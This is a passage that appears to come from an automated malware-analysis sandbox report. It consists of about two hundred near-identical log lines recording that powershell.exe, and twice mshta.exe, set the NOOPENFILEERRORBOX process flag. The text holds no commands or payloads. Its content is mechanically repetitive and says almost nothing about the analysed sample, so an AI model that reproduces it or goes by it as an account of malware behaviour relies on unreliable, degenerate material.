                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
